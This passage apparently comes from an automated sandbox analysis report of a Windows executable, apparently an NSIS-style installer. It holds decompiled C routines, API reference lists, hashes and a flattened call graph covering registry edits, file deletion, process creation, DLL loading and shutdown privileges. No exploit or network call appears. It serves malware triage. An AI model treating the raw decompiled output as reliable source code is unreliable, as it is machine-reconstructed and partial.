                                                            				if(_t21 != 0) {
                                                            					L4:
                                                            					 *_t30 =  *_t30 & 0x00000000;
                                                            				} else {
                                                            					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                            					_t21 = RegCloseKey(_a20);
                                                            					_t30[0x1fff] = _t30[0x1fff] & 0x00000000;
                                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            				return _t21;
                                                            			}








                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: Call
                                                            • API String ID: 3356406503-1824292864
                                                            • Opcode ID: 0e2aff98927a56fbb8766ba1e0bf3348b0e54a59a95deda98292fd61a1f7ac98
                                                            • Instruction ID: 5cbf1d77a42ccbfbde14d2bcc727d6f9e9f9e3285794b8b30d10470a11d9e604
                                                            • Opcode Fuzzy Hash: 0e2aff98927a56fbb8766ba1e0bf3348b0e54a59a95deda98292fd61a1f7ac98
                                                            • Instruction Fuzzy Hash: 7501BC32500209ABDF22CF60CC09FDB3FA8EF44360F01803AF916A6192D378C964CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405D4F(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                            				int _v8;
                                                            				int _t12;
                                                            				int _t14;
                                                            				int _t15;
                                                            				CHAR* _t17;
                                                            				CHAR* _t27;
                                                            
                                                            				_t12 = lstrlenA(_a8);
                                                            				_t27 = _a4;
                                                            				_v8 = _t12;
                                                            				while(lstrlenA(_t27) >= _v8) {
                                                            					_t14 = _v8;
                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                            					if(_t15 == 0) {
                                                            						_t17 = _t27;
                                                            					} else {
                                                            						_t27 = CharNextA(_t27);
                                                            						continue;
                                                            					}
                                                            					L5:
                                                            					return _t17;
                                                            				}
                                                            				_t17 = 0;
                                                            				goto L5;
                                                            			}










                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D77
                                                            • CharNextA.USER32(00000000), ref: 00405D88
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                            • Instruction ID: 87b880d6ec66590321046a57115c6c0db4d123b3cd257c49f1686e195a850605
                                                            • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                            • Instruction Fuzzy Hash: 0DF0F632200814FFCB02DFA4DD44D9FBBA8EF55350B2580BAE840F7210D634DE019BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:19%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:1578
                                                            Total number of Limit Nodes:49
API calls 5436->5437 5438 4027c8 5436->5438 5437->5438 4052 73c32288 4083 73c312c6 GlobalAlloc 4052->4083 4054 73c322b4 4084 73c312c6 GlobalAlloc 4054->4084 4056 73c328f7 GlobalFree GlobalFree GlobalFree 4057 73c32917 4056->4057 4069 73c32965 4056->4069 4060 73c329b5 4057->4060 4067 73c32930 4057->4067 4057->4069 4058 73c322bf 4058->4056 4059 73c32814 GlobalAlloc 4058->4059 4064 73c32866 lstrcpyA 4058->4064 4065 73c32884 GlobalFree 4058->4065 4068 73c32871 lstrcpyA 4058->4068 4077 73c328c2 4058->4077 4078 73c32718 GlobalFree 4058->4078 4079 73c312af 2 API calls 4058->4079 4081 73c327b8 lstrcpyA 4058->4081 4085 73c312c6 GlobalAlloc 4058->4085 4059->4058 4061 73c329d6 GetModuleHandleA 4060->4061 4060->4069 4062 73c329e7 LoadLibraryA 4061->4062 4063 73c329fc 4061->4063 4062->4063 4062->4069 4088 73c31ece GetProcAddress 4063->4088 4064->4068 4065->4058 4067->4069 4073 73c312af 2 API calls 4067->4073 4068->4058 4070 73c32a09 4071 73c32a48 4070->4071 4082 73c32a32 GetProcAddress 4070->4082 4071->4069 4072 73c32a56 lstrlenA 4071->4072 4089 73c31ece GetProcAddress 4072->4089 4073->4069 4076 73c32a70 4076->4069 4077->4058 4086 73c312d5 GlobalSize GlobalAlloc 4077->4086 4078->4058 4079->4058 4081->4058 4082->4071 4083->4054 4084->4058 4085->4058 4087 73c312f3 4086->4087 4087->4077 4088->4070 4089->4076 5439 40260c 5440 402c39 17 API calls 5439->5440 5441 402613 5440->5441 5444 405dea GetFileAttributesA CreateFileA 5441->5444 5443 40261f 5444->5443 5445 401490 5446 405378 24 API calls 5445->5446 5447 401497 5446->5447 5448 402590 5449 402c79 17 API calls 5448->5449 5450 40259a 5449->5450 5451 402c17 17 API calls 5450->5451 5452 4025a3 5451->5452 5453 4025ca RegEnumValueA 5452->5453 5454 4025be RegEnumKeyA 5452->5454 5456 4027c8 5452->5456 5455 4025df RegCloseKey 5453->5455 5454->5455 5455->5456 4729 40159d 4730 402c39 17 API calls 4729->4730 4731 4015a4 SetFileAttributesA 4730->4731 4732 4015b6 4731->4732 5458 40149d 5459 4014ab PostQuitMessage 5458->5459 5460 40238f 
5458->5460 5459->5460 4758 401a1e 4759 402c39 17 API calls 4758->4759 4760 401a27 ExpandEnvironmentStringsA 4759->4760 4761 401a3b 4760->4761 4763 401a4e 4760->4763 4762 401a40 lstrcmpA 4761->4762 4761->4763 4762->4763 5466 40251e 5467 402c79 17 API calls 5466->5467 5468 402528 5467->5468 5469 402c39 17 API calls 5468->5469 5470 402531 5469->5470 5471 40253b RegQueryValueExA 5470->5471 5476 4027c8 5470->5476 5472 402561 RegCloseKey 5471->5472 5473 40255b 5471->5473 5472->5476 5473->5472 5477 4061b5 wsprintfA 5473->5477 5477->5472 5478 40471f 5479 404755 5478->5479 5480 40472f 5478->5480 5482 40433b 8 API calls 5479->5482 5481 4042d4 18 API calls 5480->5481 5483 40473c SetDlgItemTextA 5481->5483 5484 404761 5482->5484 5483->5479 5485 40171f 5486 402c39 17 API calls 5485->5486 5487 401726 SearchPathA 5486->5487 5488 401741 5487->5488 5489 401d1f 5490 402c17 17 API calls 5489->5490 5491 401d26 5490->5491 5492 402c17 17 API calls 5491->5492 5493 401d32 GetDlgItem 5492->5493 5494 402628 5493->5494 5495 402aa0 SendMessageA 5496 402ac5 5495->5496 5497 402aba InvalidateRect 5495->5497 5497->5496 3869 4023a4 3870 4023b2 3869->3870 3871 4023ac 3869->3871 3873 402c39 17 API calls 3870->3873 3875 4023c2 3870->3875 3872 402c39 17 API calls 3871->3872 3872->3870 3873->3875 3876 402c39 17 API calls 3875->3876 3877 4023d0 3875->3877 3876->3877 3879 402c39 3877->3879 3880 402c45 3879->3880 3885 4062ea 3880->3885 3883 4023d9 WritePrivateProfileStringA 3889 4062f7 3885->3889 3886 40651c 3887 402c66 3886->3887 3918 406257 lstrcpynA 3886->3918 3887->3883 3902 406535 3887->3902 3889->3886 3890 4064f6 lstrlenA 3889->3890 3892 4062ea 10 API calls 3889->3892 3895 406412 GetSystemDirectoryA 3889->3895 3896 406425 GetWindowsDirectoryA 3889->3896 3897 406535 5 API calls 3889->3897 3898 4062ea 10 API calls 3889->3898 3899 40649f lstrcatA 3889->3899 3900 406459 SHGetSpecialFolderLocation 3889->3900 3911 40613e 3889->3911 3916 4061b5 wsprintfA 3889->3916 3917 406257 lstrcpynA 3889->3917 
3890->3889 3892->3890 3895->3889 3896->3889 3897->3889 3898->3889 3899->3889 3900->3889 3901 406471 SHGetPathFromIDListA CoTaskMemFree 3900->3901 3901->3889 3909 406541 3902->3909 3903 4065a9 3904 4065ad CharPrevA 3903->3904 3906 4065c8 3903->3906 3904->3903 3905 40659e CharNextA 3905->3903 3905->3909 3906->3883 3908 40658c CharNextA 3908->3909 3909->3903 3909->3905 3909->3908 3910 406599 CharNextA 3909->3910 3923 405c14 3909->3923 3910->3905 3919 4060dd 3911->3919 3914 406172 RegQueryValueExA RegCloseKey 3915 4061a1 3914->3915 3915->3889 3916->3889 3917->3889 3918->3887 3920 4060ec 3919->3920 3921 4060f5 RegOpenKeyExA 3920->3921 3922 4060f0 3920->3922 3921->3922 3922->3914 3922->3915 3924 405c1a 3923->3924 3925 405c2d 3924->3925 3926 405c20 CharNextA 3924->3926 3925->3909 3926->3924 3938 4020a5 3939 4020b7 3938->3939 3949 402165 3938->3949 3940 402c39 17 API calls 3939->3940 3941 4020be 3940->3941 3943 402c39 17 API calls 3941->3943 3942 401423 24 API calls 3945 4022ea 3942->3945 3944 4020c7 3943->3944 3946 4020dc LoadLibraryExA 3944->3946 3947 4020cf GetModuleHandleA 3944->3947 3948 4020ec GetProcAddress 3946->3948 3946->3949 3947->3946 3947->3948 3950 402138 3948->3950 3951 4020fb 3948->3951 3949->3942 3959 405378 3950->3959 3954 40210b 3951->3954 3956 401423 3951->3956 3954->3945 3955 402159 FreeLibrary 3954->3955 3955->3945 3957 405378 24 API calls 3956->3957 3958 401431 3957->3958 3958->3954 3960 405436 3959->3960 3961 405393 3959->3961 3960->3954 3962 4053b0 lstrlenA 3961->3962 3963 4062ea 17 API calls 3961->3963 3964 4053d9 3962->3964 3965 4053be lstrlenA 3962->3965 3963->3962 3967 4053ec 3964->3967 3968 4053df SetWindowTextA 3964->3968 3965->3960 3966 4053d0 lstrcatA 3965->3966 3966->3964 3967->3960 3969 4053f2 SendMessageA SendMessageA SendMessageA 3967->3969 3968->3967 3969->3960 5498 402e25 5499 402e34 SetTimer 5498->5499 5500 402e4d 5498->5500 5499->5500 5501 402ea2 5500->5501 5502 402e67 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5500->5502 
5502->5501 5503 73c32b24 5504 73c32b76 5503->5504 5505 73c32b80 GetLastError 5504->5505 5506 73c32b8b 5504->5506 5505->5506 5507 73c31a24 5508 73c31504 GlobalFree 5507->5508 5509 73c31a3c 5508->5509 5510 73c31a7e GlobalFree 5509->5510 5511 73c31a5a 5509->5511 5512 73c31a6a VirtualFree 5509->5512 5511->5510 5512->5510 5513 73c31c2b 5514 73c31c52 5513->5514 5515 73c31cad __alldvrm 5514->5515 5516 73c31c8f GlobalFree 5514->5516 5517 73c3157e 2 API calls 5515->5517 5516->5515 5518 73c31d41 GlobalFree GlobalFree 5517->5518 4007 402429 4008 402430 4007->4008 4009 40245b 4007->4009 4023 402c79 4008->4023 4011 402c39 17 API calls 4009->4011 4013 402462 4011->4013 4019 402cf7 4013->4019 4014 402441 4016 402c39 17 API calls 4014->4016 4018 402448 RegDeleteValueA RegCloseKey 4016->4018 4017 40246f 4018->4017 4020 402d03 4019->4020 4021 402d0a 4019->4021 4020->4017 4021->4020 4028 402d3b 4021->4028 4024 402c39 17 API calls 4023->4024 4025 402c90 4024->4025 4026 4060dd RegOpenKeyExA 4025->4026 4027 402437 4026->4027 4027->4014 4027->4017 4029 4060dd RegOpenKeyExA 4028->4029 4030 402d69 4029->4030 4031 402d73 4030->4031 4032 402e1e 4030->4032 4033 402d79 RegEnumValueA 4031->4033 4034 402d9c 4031->4034 4032->4020 4033->4034 4036 402e03 RegCloseKey 4033->4036 4035 402dd8 RegEnumKeyA 4034->4035 4034->4036 4037 402de1 RegCloseKey 4034->4037 4039 402d3b 6 API calls 4034->4039 4035->4034 4035->4037 4036->4032 4043 406663 GetModuleHandleA 4037->4043 4039->4034 4041 402e13 4041->4032 4042 402df5 RegDeleteKeyA 4042->4032 4044 406689 GetProcAddress 4043->4044 4045 40667f 4043->4045 4047 402df1 4044->4047 4049 4065f5 GetSystemDirectoryA 4045->4049 4047->4041 4047->4042 4048 406685 4048->4044 4048->4047 4050 406617 wsprintfA LoadLibraryExA 4049->4050 4050->4048 5519 4027aa 5520 402c39 17 API calls 5519->5520 5521 4027b1 FindFirstFileA 5520->5521 5522 4027d4 5521->5522 5526 4027c4 5521->5526 5523 4027db 5522->5523 5527 4061b5 wsprintfA 5522->5527 5528 406257 lstrcpynA 5523->5528 5527->5523 
5528->5526 5529 401c2e 5530 402c17 17 API calls 5529->5530 5531 401c35 5530->5531 5532 402c17 17 API calls 5531->5532 5533 401c42 5532->5533 5534 401c57 5533->5534 5535 402c39 17 API calls 5533->5535 5536 401c67 5534->5536 5537 402c39 17 API calls 5534->5537 5535->5534 5538 401c72 5536->5538 5539 401cbe 5536->5539 5537->5536 5541 402c17 17 API calls 5538->5541 5540 402c39 17 API calls 5539->5540 5543 401cc3 5540->5543 5542 401c77 5541->5542 5544 402c17 17 API calls 5542->5544 5545 402c39 17 API calls 5543->5545 5546 401c83 5544->5546 5547 401ccc FindWindowExA 5545->5547 5548 401c90 SendMessageTimeoutA 5546->5548 5549 401cae SendMessageA 5546->5549 5550 401cea 5547->5550 5548->5550 5549->5550 5551 40262e 5552 402633 5551->5552 5553 402647 5551->5553 5554 402c17 17 API calls 5552->5554 5555 402c39 17 API calls 5553->5555 5557 40263c 5554->5557 5556 40264e lstrlenA 5555->5556 5556->5557 5558 405e91 WriteFile 5557->5558 5559 402670 5557->5559 5558->5559 4090 401932 4091 401934 4090->4091 4092 402c39 17 API calls 4091->4092 4093 401939 4092->4093 4096 405a19 4093->4096 4137 405cd7 4096->4137 4099 405a41 DeleteFileA 4104 401942 4099->4104 4100 405a58 4102 405b90 4100->4102 4151 406257 lstrcpynA 4100->4151 4102->4104 4169 4065ce FindFirstFileA 4102->4169 4103 405a7e 4105 405a91 4103->4105 4106 405a84 lstrcatA 4103->4106 4152 405c30 lstrlenA 4105->4152 4108 405a97 4106->4108 4111 405aa5 lstrcatA 4108->4111 4112 405a9c 4108->4112 4114 405ab0 lstrlenA FindFirstFileA 4111->4114 4112->4111 4112->4114 4113 405bae 4172 405be9 lstrlenA CharPrevA 4113->4172 4115 405b86 4114->4115 4135 405ad4 4114->4135 4115->4102 4117 405c14 CharNextA 4117->4135 4119 4059d1 5 API calls 4120 405bc0 4119->4120 4121 405bc4 4120->4121 4122 405bda 4120->4122 4121->4104 4127 405378 24 API calls 4121->4127 4123 405378 24 API calls 4122->4123 4123->4104 4124 405b65 FindNextFileA 4126 405b7d FindClose 4124->4126 4124->4135 4126->4115 4128 405bd1 4127->4128 4130 406030 36 API calls 4128->4130 4131 405bd8 
4130->4131 4131->4104 4132 405a19 60 API calls 4132->4135 4133 405378 24 API calls 4133->4124 4134 405378 24 API calls 4134->4135 4135->4117 4135->4124 4135->4132 4135->4133 4135->4134 4156 406257 lstrcpynA 4135->4156 4157 4059d1 4135->4157 4165 406030 MoveFileExA 4135->4165 4175 406257 lstrcpynA 4137->4175 4139 405ce8 4176 405c82 CharNextA CharNextA 4139->4176 4142 405a39 4142->4099 4142->4100 4143 406535 5 API calls 4149 405cfe 4143->4149 4144 405d29 lstrlenA 4145 405d34 4144->4145 4144->4149 4147 405be9 3 API calls 4145->4147 4146 4065ce 2 API calls 4146->4149 4148 405d39 GetFileAttributesA 4147->4148 4148->4142 4149->4142 4149->4144 4149->4146 4150 405c30 2 API calls 4149->4150 4150->4144 4151->4103 4153 405c3d 4152->4153 4154 405c42 CharPrevA 4153->4154 4155 405c4e 4153->4155 4154->4153 4154->4155 4155->4108 4156->4135 4182 405dc5 GetFileAttributesA 4157->4182 4160 4059f4 DeleteFileA 4162 4059fa 4160->4162 4161 4059ec RemoveDirectoryA 4161->4162 4163 4059fe 4162->4163 4164 405a0a SetFileAttributesA 4162->4164 4163->4135 4164->4163 4166 406051 4165->4166 4167 406044 4165->4167 4166->4135 4185 405ec0 4167->4185 4170 4065e4 FindClose 4169->4170 4171 405baa 4169->4171 4170->4171 4171->4104 4171->4113 4173 405c03 lstrcatA 4172->4173 4174 405bb4 4172->4174 4173->4174 4174->4119 4175->4139 4178 405c9d 4176->4178 4181 405cad 4176->4181 4177 405ccd 4177->4142 4177->4143 4179 405ca8 CharNextA 4178->4179 4178->4181 4179->4177 4180 405c14 CharNextA 4180->4181 4181->4177 4181->4180 4183 4059dd 4182->4183 4184 405dd7 SetFileAttributesA 4182->4184 4183->4160 4183->4161 4183->4163 4184->4183 4186 405ee6 4185->4186 4187 405f0c GetShortPathNameA 4185->4187 4212 405dea GetFileAttributesA CreateFileA 4186->4212 4188 405f21 4187->4188 4189 40602b 4187->4189 4188->4189 4191 405f29 wsprintfA 4188->4191 4189->4166 4193 4062ea 17 API calls 4191->4193 4192 405ef0 CloseHandle GetShortPathNameA 4192->4189 4194 405f04 4192->4194 4195 405f51 4193->4195 4194->4187 4194->4189 4213 405dea 
GetFileAttributesA CreateFileA 4195->4213 4197 405f5e 4197->4189 4198 405f6d GetFileSize GlobalAlloc 4197->4198 4199 406024 CloseHandle 4198->4199 4200 405f8f 4198->4200 4199->4189 4214 405e62 ReadFile 4200->4214 4205 405fc2 4207 405d4f 4 API calls 4205->4207 4206 405fae lstrcpyA 4208 405fd0 4206->4208 4207->4208 4209 406007 SetFilePointer 4208->4209 4221 405e91 WriteFile 4209->4221 4212->4192 4213->4197 4215 405e80 4214->4215 4215->4199 4216 405d4f lstrlenA 4215->4216 4217 405d90 lstrlenA 4216->4217 4218 405d98 4217->4218 4219 405d69 lstrcmpiA 4217->4219 4218->4205 4218->4206 4219->4218 4220 405d87 CharNextA 4219->4220 4220->4217 4222 405eaf GlobalFree 4221->4222 4222->4199 4223 4033b3 SetErrorMode GetVersionExA 4224 403405 GetVersionExA 4223->4224 4226 403444 4223->4226 4225 403421 4224->4225 4224->4226 4225->4226 4227 4034c8 4226->4227 4228 406663 5 API calls 4226->4228 4229 4065f5 3 API calls 4227->4229 4228->4227 4230 4034de lstrlenA 4229->4230 4230->4227 4231 4034ee 4230->4231 4232 406663 5 API calls 4231->4232 4233 4034f5 4232->4233 4234 406663 5 API calls 4233->4234 4235 4034fc 4234->4235 4236 406663 5 API calls 4235->4236 4237 403508 #17 OleInitialize SHGetFileInfoA 4236->4237 4315 406257 lstrcpynA 4237->4315 4240 403556 GetCommandLineA 4316 406257 lstrcpynA 4240->4316 4242 403568 4243 405c14 CharNextA 4242->4243 4244 40358f CharNextA 4243->4244 4252 40359e 4244->4252 4245 403664 4246 403678 GetTempPathA 4245->4246 4317 403382 4246->4317 4248 403690 4249 403694 GetWindowsDirectoryA lstrcatA 4248->4249 4250 4036ea DeleteFileA 4248->4250 4253 403382 12 API calls 4249->4253 4327 402f0c GetTickCount GetModuleFileNameA 4250->4327 4251 405c14 CharNextA 4251->4252 4252->4245 4252->4251 4256 403666 4252->4256 4255 4036b0 4253->4255 4255->4250 4259 4036b4 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4255->4259 4411 406257 lstrcpynA 4256->4411 4257 4036fd 4263 405c14 CharNextA 4257->4263 4299 403782 4257->4299 4310 403792 4257->4310 4261 
403382 12 API calls 4259->4261 4265 4036e2 4261->4265 4266 403717 4263->4266 4265->4250 4265->4310 4273 4037c1 4266->4273 4274 40375c 4266->4274 4267 4037ac 4269 40596d MessageBoxIndirectA 4267->4269 4268 4038cf 4270 4038d7 GetCurrentProcess OpenProcessToken 4268->4270 4271 40394d ExitProcess 4268->4271 4275 4037b9 ExitProcess 4269->4275 4276 40391d 4270->4276 4277 4038ee LookupPrivilegeValueA AdjustTokenPrivileges 4270->4277 4421 4058d8 4273->4421 4278 405cd7 18 API calls 4274->4278 4280 406663 5 API calls 4276->4280 4277->4276 4281 403768 4278->4281 4283 403924 4280->4283 4281->4310 4412 406257 lstrcpynA 4281->4412 4286 403939 ExitWindowsEx 4283->4286 4287 403946 4283->4287 4284 4037e2 lstrcatA lstrcmpiA 4289 4037fe 4284->4289 4284->4310 4285 4037d7 lstrcatA 4285->4284 4286->4271 4286->4287 4437 40140b 4287->4437 4292 403803 4289->4292 4293 40380a 4289->4293 4291 403777 4413 406257 lstrcpynA 4291->4413 4424 40583e CreateDirectoryA 4292->4424 4429 4058bb CreateDirectoryA 4293->4429 4298 40380f SetCurrentDirectoryA 4300 40382a 4298->4300 4301 40381f 4298->4301 4355 403a3d 4299->4355 4433 406257 lstrcpynA 4300->4433 4432 406257 lstrcpynA 4301->4432 4304 4062ea 17 API calls 4305 40386c DeleteFileA 4304->4305 4306 40387a CopyFileA 4305->4306 4312 403837 4305->4312 4306->4312 4307 4038c3 4308 406030 36 API calls 4307->4308 4308->4310 4309 406030 36 API calls 4309->4312 4414 403963 4310->4414 4311 4062ea 17 API calls 4311->4312 4312->4304 4312->4307 4312->4309 4312->4311 4314 4038ae CloseHandle 4312->4314 4434 4058f0 CreateProcessA 4312->4434 4314->4312 4315->4240 4316->4242 4318 406535 5 API calls 4317->4318 4319 40338e 4318->4319 4320 403398 4319->4320 4321 405be9 3 API calls 4319->4321 4320->4248 4322 4033a0 4321->4322 4323 4058bb 2 API calls 4322->4323 4324 4033a6 4323->4324 4325 405e19 2 API calls 4324->4325 4326 4033b1 4325->4326 4326->4248 4440 405dea GetFileAttributesA CreateFileA 4327->4440 4329 402f4c 4350 402f5c 4329->4350 4441 406257 lstrcpynA 4329->4441 
4331 402f72 4332 405c30 2 API calls 4331->4332 4333 402f78 4332->4333 4442 406257 lstrcpynA 4333->4442 4335 402f83 GetFileSize 4336 40307d 4335->4336 4348 402f9a 4335->4348 4443 402ea8 4336->4443 4338 403086 4340 4030b6 GlobalAlloc 4338->4340 4338->4350 4478 40336b SetFilePointer 4338->4478 4454 40336b SetFilePointer 4340->4454 4342 4030e9 4346 402ea8 6 API calls 4342->4346 4344 40309f 4347 403355 ReadFile 4344->4347 4345 4030d1 4455 403143 4345->4455 4346->4350 4351 4030aa 4347->4351 4348->4336 4348->4342 4348->4350 4352 402ea8 6 API calls 4348->4352 4475 403355 4348->4475 4350->4257 4351->4340 4351->4350 4352->4348 4353 4030dd 4353->4350 4353->4353 4354 40311a SetFilePointer 4353->4354 4354->4350 4356 406663 5 API calls 4355->4356 4357 403a51 4356->4357 4358 403a57 4357->4358 4359 403a69 4357->4359 4499 4061b5 wsprintfA 4358->4499 4360 40613e 3 API calls 4359->4360 4361 403a94 4360->4361 4363 403ab2 lstrcatA 4361->4363 4365 40613e 3 API calls 4361->4365 4364 403a67 4363->4364 4484 403d02 4364->4484 4365->4363 4368 405cd7 18 API calls 4369 403ae4 4368->4369 4370 403b6d 4369->4370 4372 40613e 3 API calls 4369->4372 4371 405cd7 18 API calls 4370->4371 4373 403b73 4371->4373 4374 403b10 4372->4374 4375 403b83 LoadImageA 4373->4375 4376 4062ea 17 API calls 4373->4376 4374->4370 4379 403b2c lstrlenA 4374->4379 4382 405c14 CharNextA 4374->4382 4377 403c29 4375->4377 4378 403baa RegisterClassA 4375->4378 4376->4375 4381 40140b 2 API calls 4377->4381 4380 403be0 SystemParametersInfoA CreateWindowExA 4378->4380 4410 403c33 4378->4410 4383 403b60 4379->4383 4384 403b3a lstrcmpiA 4379->4384 4380->4377 4385 403c2f 4381->4385 4387 403b2a 4382->4387 4386 405be9 3 API calls 4383->4386 4384->4383 4388 403b4a GetFileAttributesA 4384->4388 4389 403d02 18 API calls 4385->4389 4385->4410 4390 403b66 4386->4390 4387->4379 4391 403b56 4388->4391 4392 403c40 4389->4392 4500 406257 lstrcpynA 4390->4500 4391->4383 4394 405c30 2 API calls 4391->4394 4395 403c4c ShowWindow 4392->4395 4396 
403ccf 4392->4396 4394->4383 4398 4065f5 3 API calls 4395->4398 4492 40544a OleInitialize 4396->4492 4400 403c64 4398->4400 4399 403cd5 4401 403cf1 4399->4401 4402 403cd9 4399->4402 4403 403c72 GetClassInfoA 4400->4403 4405 4065f5 3 API calls 4400->4405 4404 40140b 2 API calls 4401->4404 4408 40140b 2 API calls 4402->4408 4402->4410 4406 403c86 GetClassInfoA RegisterClassA 4403->4406 4407 403c9c DialogBoxParamA 4403->4407 4404->4410 4405->4403 4406->4407 4409 40140b 2 API calls 4407->4409 4408->4410 4409->4410 4410->4310 4411->4246 4412->4291 4413->4299 4415 40397b 4414->4415 4416 40396d CloseHandle 4414->4416 4512 4039a8 4415->4512 4416->4415 4419 405a19 67 API calls 4420 40379a OleUninitialize 4419->4420 4420->4267 4420->4268 4422 406663 5 API calls 4421->4422 4423 4037c6 lstrcatA 4422->4423 4423->4284 4423->4285 4425 403808 4424->4425 4426 40588f GetLastError 4424->4426 4425->4298 4426->4425 4427 40589e SetFileSecurityA 4426->4427 4427->4425 4428 4058b4 GetLastError 4427->4428 4428->4425 4430 4058cb 4429->4430 4431 4058cf GetLastError 4429->4431 4430->4298 4431->4430 4432->4300 4433->4312 4435 405923 CloseHandle 4434->4435 4436 40592f 4434->4436 4435->4436 4436->4312 4438 401389 2 API calls 4437->4438 4439 401420 4438->4439 4439->4271 4440->4329 4441->4331 4442->4335 4444 402eb1 4443->4444 4445 402ec9 4443->4445 4446 402ec1 4444->4446 4447 402eba DestroyWindow 4444->4447 4448 402ed1 4445->4448 4449 402ed9 GetTickCount 4445->4449 4446->4338 4447->4446 4479 40669f 4448->4479 4451 402ee7 CreateDialogParamA ShowWindow 4449->4451 4452 402f0a 4449->4452 4451->4452 4452->4338 4454->4345 4456 403159 4455->4456 4457 403187 4456->4457 4483 40336b SetFilePointer 4456->4483 4459 403355 ReadFile 4457->4459 4460 403192 4459->4460 4461 4032d8 4460->4461 4462 4031a4 GetTickCount 4460->4462 4463 4032ee 4460->4463 4461->4353 4462->4461 4468 4031f3 4462->4468 4464 403330 4463->4464 4467 4032f2 4463->4467 4465 403355 ReadFile 4464->4465 4465->4461 4466 403355 ReadFile 4466->4468 
4467->4461 4469 403355 ReadFile 4467->4469 4470 405e91 WriteFile 4467->4470 4468->4461 4468->4466 4471 403249 GetTickCount 4468->4471 4472 40326e MulDiv wsprintfA 4468->4472 4474 405e91 WriteFile 4468->4474 4469->4467 4470->4467 4471->4468 4473 405378 24 API calls 4472->4473 4473->4468 4474->4468 4476 405e62 ReadFile 4475->4476 4477 403368 4476->4477 4477->4348 4478->4344 4480 4066bc PeekMessageA 4479->4480 4481 4066b2 DispatchMessageA 4480->4481 4482 402ed7 4480->4482 4481->4480 4482->4338 4483->4457 4485 403d16 4484->4485 4501 4061b5 wsprintfA 4485->4501 4487 403d87 4502 403dbb 4487->4502 4489 403ac2 4489->4368 4490 403d8c 4490->4489 4491 4062ea 17 API calls 4490->4491 4491->4490 4505 404320 4492->4505 4494 404320 SendMessageA 4496 4054a6 OleUninitialize 4494->4496 4495 40546d 4498 405494 4495->4498 4508 401389 4495->4508 4496->4399 4498->4494 4499->4364 4500->4370 4501->4487 4503 4062ea 17 API calls 4502->4503 4504 403dc9 SetWindowTextA 4503->4504 4504->4490 4506 404338 4505->4506 4507 404329 SendMessageA 4505->4507 4506->4495 4507->4506 4510 401390 4508->4510 4509 4013fe 4509->4495 4510->4509 4511 4013cb MulDiv SendMessageA 4510->4511 4511->4510 4513 4039b6 4512->4513 4514 403980 4513->4514 4515 4039bb FreeLibrary GlobalFree 4513->4515 4514->4419 4515->4514 4515->4515 5560 402733 5561 40273a 5560->5561 5564 402a47 5560->5564 5562 402c17 17 API calls 5561->5562 5563 402741 5562->5563 5565 402750 SetFilePointer 5563->5565 5565->5564 5566 402760 5565->5566 5568 4061b5 wsprintfA 5566->5568 5568->5564 5569 401e35 GetDC 5570 402c17 17 API calls 5569->5570 5571 401e47 GetDeviceCaps MulDiv ReleaseDC 5570->5571 5572 402c17 17 API calls 5571->5572 5573 401e78 5572->5573 5574 4062ea 17 API calls 5573->5574 5575 401eb5 CreateFontIndirectA 5574->5575 5576 402628 5575->5576 4521 4054b6 4522 405661 4521->4522 4523 4054d8 GetDlgItem GetDlgItem GetDlgItem 4521->4523 4525 405691 4522->4525 4526 405669 GetDlgItem CreateThread CloseHandle 4522->4526 4567 404309 SendMessageA 
